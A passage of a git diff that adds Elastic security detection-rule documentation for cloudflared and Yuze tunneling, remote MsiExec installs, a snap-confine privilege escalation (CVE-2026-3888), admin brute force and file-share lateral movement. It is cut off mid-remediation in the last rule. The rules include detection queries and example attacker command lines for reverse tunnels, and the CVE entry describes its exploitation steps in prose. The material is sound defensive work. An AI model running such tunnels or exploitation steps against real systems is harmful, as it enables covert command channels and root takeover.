a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc new file mode 100644 index 0000000000..17b2312992 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared]] +=== Potential Protocol Tunneling via Cloudflared + +Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://developers.cloudflare.com/cloudflare-one/connections/connect-apps/install-and-setup/tunnel-useful-commands/ +* https://attack.mitre.org/techniques/T1572/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Protocol Tunneling via Cloudflared* + + +Cloudflare Tunnel (cloudflared) is a legitimate tool for exposing local services through Cloudflare's edge. Adversaries abuse it to create quick or named tunnels for C2, data exfiltration, or ingress tool transfer while evading direct connection blocking. + + +*Possible investigation steps* + + +- Confirm the process command line for `tunnel`, `--url`, or `tunnel run` to validate cloudflared tunnel usage. +- Identify the parent process and process executable path; cloudflared run from temp or user writable locations is more suspicious than from Program Files. +- For quick tunnel (`--url http://...`), identify the local URL and whether it could be a C2 callback or proxy. +- Correlate with network data for outbound connections to Cloudflare IPs or trycloudflare.com-style hostnames around the same time. +- Review the user and session that started the tunnel; look for other suspicious logon or execution from the same context. + + +*False positive analysis* + + +- Legitimate use of Cloudflare Tunnel for development or internal services may trigger this rule; consider allowlisting by path or user for approved use cases. + + +*Response and remediation* + + +- If unauthorized tunnel use is confirmed: isolate the host, terminate the cloudflared process, and block cloudflared or Cloudflare tunnel domains at DNS/firewall where policy permits. +- Rotate credentials for any accounts that may have been exposed over the tunnel. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "cloudflared.exe" or ?process.pe.original_file_name == "cloudflared.exe" or ?process.code_signature.subject_name : "Cloudflare, Inc.") and process.args : "tunnel" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc new file mode 100644 index 0000000000..0cf9a161e0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze]] +=== Potential Protocol Tunneling via Yuze + +Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1572/ +* https://github.com/P001water/yuze +* https://www.trendmicro.com/tr_tr/research/26/c/dissecting-a-warlock-attack.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Protocol Tunneling via Yuze* + + +Yuze is a C-based tunneling tool used for intranet penetration and supports forward and reverse SOCKS5 proxy tunneling. It is commonly executed as `rundll32 yuze.dll,RunYuze reverse -c :` and has been observed in threat actor campaigns. + + +*Possible investigation steps* + + +- Confirm the command line contains `yuze.dll` and `RunYuze`; typical form is `rundll32 yuze.dll,RunYuze reverse -c :`. +- Extract the remote endpoint from the `-c` argument (C2 or relay) and look up the IP/domain in threat intelligence. +- Locate where yuze.dll was loaded from; check file creation time to see if it was recently dropped. +- Identify the parent process that started rundll32 (script, scheduled task, exploit, etc.) to understand the execution chain. +- Correlate with network events for outbound connections from this host to the IP/port in the command line. + + +*False positive analysis* + + +- Legitimate use of Yuze is rare; most hits are likely malicious or red-team. If you use Yuze for authorized testing, consider an exception by host or user. + + +*Response and remediation* + + +- Isolate the host and terminate the rundll32 process. +- Remove yuze.dll from disk and hunt for other copies or related artifacts. +- Block the C2/relay IP or domain at DNS/firewall; rotate credentials if the tunnel was used for access. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + ( + (process.args : "reverse" and process.args : ("-c", "-s")) or + (process.args : ("proxy", "fwd") and process.args : "-l") + ) and + (?process.code_signature.exists == false or process.name : "rundll32.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc new file mode 100644 index 0000000000..1ae250ddb3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-18-potential-remote-install-via-msiexec]] +=== Potential Remote Install via MsiExec + +Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.forwarded* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Windows Security Event Logs +* Data Source: Microsoft Defender for Endpoint +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Remote Install via MsiExec* + + +MsiExec is a Windows utility for installing, maintaining, and removing software. Adversaries exploit it to execute malicious payloads by disguising them as legitimate installations. The detection rule identifies suspicious child processes spawned by MsiExec that initiate network activity, which is atypical for standard installations. By focusing on unusual executable paths and network connections, the rule helps uncover potential misuse indicative of malware delivery or initial access attempts. + + +*Possible investigation steps* + + +- Review the process tree to identify the parent and child processes of the suspicious MsiExec activity, focusing on the process.entity_id and process.parent.name fields to understand the execution flow. +- Examine the process.executable path to determine if it deviates from typical installation paths, as specified in the query, to assess the likelihood of malicious activity. +- Analyze the network or DNS activity associated with the process by reviewing the event.category field for network or dns events, and correlate these with the process.name to identify any unusual or unauthorized connections. +- Check the process.args for any unusual or suspicious command-line arguments that might indicate an attempt to execute malicious payloads or scripts. +- Investigate the host's recent activity and security logs to identify any other indicators of compromise or related suspicious behavior, leveraging data sources like Elastic Defend, Sysmon, or SentinelOne as mentioned in the rule's tags. +- Assess the risk and impact of the detected activity by considering the context of the alert, such as the host's role in the network and any potential data exposure or system compromise. + + +*False positive analysis* + + +- Legitimate software installations or updates may trigger the rule if they involve network activity. Users can create exceptions for known software update processes that are verified as safe. +- Custom enterprise applications that use MsiExec for deployment and require network access might be flagged. Identify these applications and exclude their specific executable paths from the rule. +- Automated deployment tools that utilize MsiExec and perform network operations could be misidentified. Review these tools and whitelist their processes to prevent false alerts. +- Security software or system management tools that leverage MsiExec for legitimate purposes may cause false positives. Confirm these tools' activities and add them to an exclusion list if necessary. +- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate software that may interact with MsiExec. + + +*Response and remediation* + + +- Isolate the affected system from the network immediately to prevent further malicious activity and lateral movement. +- Terminate the suspicious child process spawned by MsiExec to halt any ongoing malicious operations. +- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or remnants. +- Review and analyze the process execution and network activity logs to identify any additional indicators of compromise (IOCs) and assess the scope of the intrusion. +- Reset credentials and review access permissions for any accounts that may have been compromised or used during the attack. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced monitoring and detection rules to identify similar threats in the future, focusing on unusual MsiExec activity and network connections. + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and process.command_line : "*http*" and + process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and + process.parent.name : ("sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe", "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe") and + not process.command_line : ("*--set-server=*", "*UPGRADEADD=*" , "*--url=*", + "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*", "*app.ninjarmm.com*", "*zoom.us/client*", + "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*", "*awscli.amazonaws.com*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc new file mode 100644 index 0000000000..be71191a07 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc @@ -0,0 +1,147 @@ +[[prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888]] +=== Potential snap-confine Privilege Escalation via CVE-2026-3888 + +This rule detects non-root file creation within "/tmp/.snap" or its host backing path "/tmp/snap-private-tmp/*/tmp/.snap", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the "/tmp/.snap" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of ".snap" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/17/cve-2026-3888-important-snap-flaw-enables-local-privilege-escalation-to-root +* https://cdn2.qualys.com/advisory/2026/03/17/snap-confine-systemd-tmpfiles.txt + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential snap-confine Privilege Escalation via CVE-2026-3888* + + +This rule flags non-root creation of files under temporary snap sandbox directories that snap-confine should prepare as root, which can expose an attempt to abuse CVE-2026-3888 for local root access. A common pattern is an unprivileged user waiting for stale `/tmp/.snap` content to be removed, recreating that path, and dropping crafted libraries or configuration so the next snap launch pulls attacker-controlled files into the sandbox setup and elevates privileges. + + +*Possible investigation steps* + + +- Review the originating user's recent terminal, SSH, sudo, and scheduled-task activity to determine whether the file creation was part of legitimate administration or an unexpected local execution chain. +- Inspect the affected `.snap` directory contents for crafted symlinks, shared libraries, configuration files, or path redirection artifacts that could be consumed during snap sandbox initialization. +- Correlate the activity with nearby launches of `snap`, `snap-confine`, `snapd`, or installed snap applications and determine whether any such execution was followed by a new root-level process tree. +- Look for evidence that `systemd-tmpfiles` or another cleanup mechanism removed the stale directory shortly before it was recreated by the unprivileged account, as this timing strongly supports CVE-2026-3888 exploitation behavior. +- Examine post-alert host activity for signs of successful escalation such as unexpected root-owned file changes, new setuid binaries, persistence creation, credential access, or security control tampering. + + +*False positive analysis* + + +- A user troubleshooting a failing snap application may manually create or modify files under `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap`; verify by reviewing the parent shell/process lineage and nearby `snap` or `snap-confine` executions to confirm it was interactive testing with no follow-on root activity. +- Telemetry can occasionally attribute file creation to the invoking non-root user during normal snap sandbox initialization even though the privileged helper completes the action; verify by checking whether related `snap` or `snap-confine` events occurred at the same time and whether the final directory and files are owned by root. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network, stop any active `snap`, `snap-confine`, or suspicious root shell processes tied to the originating user, and preserve the contents of `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap` for evidence. +- Remove attacker-controlled files, symlinks, shared libraries, and configuration placed in the recreated `.snap` paths, then delete any persistence added after the event such as unauthorized `systemd` units, `/etc/cron*` entries, `~/.ssh/authorized_keys` changes, sudoers modifications, new local accounts, or unexpected setuid-root binaries. +- Escalate immediately to incident response and treat the host as fully compromised if you confirm a root-owned process tree descending from the unprivileged user, root-level file changes outside the temporary snap path, or tampering with `/etc/ld.so.preload`, PAM modules, or endpoint security agents. +- Restore the host to a known-good state by rebuilding or reimaging it when privilege escalation cannot be conclusively ruled out, or otherwise replace modified system files from trusted packages, rotate credentials exposed on the system, and verify correct root ownership and permissions on snap temporary directories before reconnecting it. +- Harden the environment by applying the vendor fix for CVE-2026-3888, updating `snapd` and related Ubuntu packages, restricting unnecessary local shell access, and increasing monitoring for non-root creation of files under `/tmp/.snap` and `/tmp/snap-private-tmp/*/tmp/.snap`. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action == "creation" and +file.path like ("/tmp/.snap*", "/tmp/snap-private-tmp/*/tmp/.snap*") and +user.id != "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc new file mode 100644 index 0000000000..b08720f696 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc @@ -0,0 +1,155 @@ +[[prebuilt-rule-8-19-18-privileged-accounts-brute-force]] +=== Privileged Accounts Brute Force + +Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide +* Data Source: Windows Security Event Logs + +*Version*: 118 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Privileged Accounts Brute Force* + + +Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found https://attack.mitre.org/techniques/T1110/001/[here]. + +This rule identifies potential password guessing/brute force activity from a single address against multiple accounts that contains the `admin` pattern on its name, which is likely a highly privileged account. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the logon failure reason code and the targeted user name. + - Prioritize the investigation if the account is critical or has administrative privileges over the domain. +- Investigate the source IP address of the failed Network Logon attempts. + - Identify whether these attempts are coming from the internet or are internal. +- Investigate other alerts associated with the involved users and source host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. +- Check whether the involved credentials are used in automation or scheduled tasks. +- If this activity is suspicious, contact the account owner and confirm whether they are aware of it. +- Examine the source host for derived artifacts that indicate compromise: + - Observe and collect information about the following activities in the alert source host: + - Attempts to contact external domains and addresses. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity. + + +*False positive analysis* + + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Domain trust relationship issues. +- Infrastructure or availability issues. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the source host to prevent further post-compromise behavior. +- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where event.category == "authentication" and host.os.type == "windows" and event.action == "logon-failed" and + winlog.logon.type == "Network" and source.ip is not null and winlog.computer_name is not null and + not cidr_match(TO_IP(source.ip), "127.0.0.0/8", "::1") and + to_lower(winlog.event_data.TargetUserName) like "*admin*" and + /* + noisy failure status codes often associated to authentication misconfiguration + 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine. + 0XC000005E - There are currently no logon servers available to service the logon request. + 0XC0000133 - Clocks between DC and other computer too far out of sync. + 0XC0000192 An attempt was made to logon, but the Netlogon service was not started. + 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication. + */ + not winlog.event_data.Status in ("0xc000015b", "0xc000005e", "0xc0000133", "0xc0000192", "0xc00000dc") +// truncate the timestamp to a 60-second window +| eval Esql.time_window = date_trunc(60 seconds, @timestamp) +| stats Esql.failed_auth_count = COUNT(*), + Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName), + Esql.count_distinct_user_name = count_distinct(winlog.event_data.TargetUserName), + Esql.user_domain_values = VALUES(user.domain), + Esql.error_codes = VALUES(winlog.event_data.Status), + Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type +| where Esql.failed_auth_count >= 50 and Esql.count_distinct_user_name >= 2 +| eval user.name = mv_first(Esql.target_user_name_values) +| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc new file mode 100644 index 0000000000..b21acf5291 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc @@ -0,0 +1,162 @@ +[[prebuilt-rule-8-19-18-remote-execution-via-file-shares]] +=== Remote Execution via File Shares + +Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://web.archive.org/web/20230329172636/https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html +* https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 121 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote Execution via File Shares* + + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- 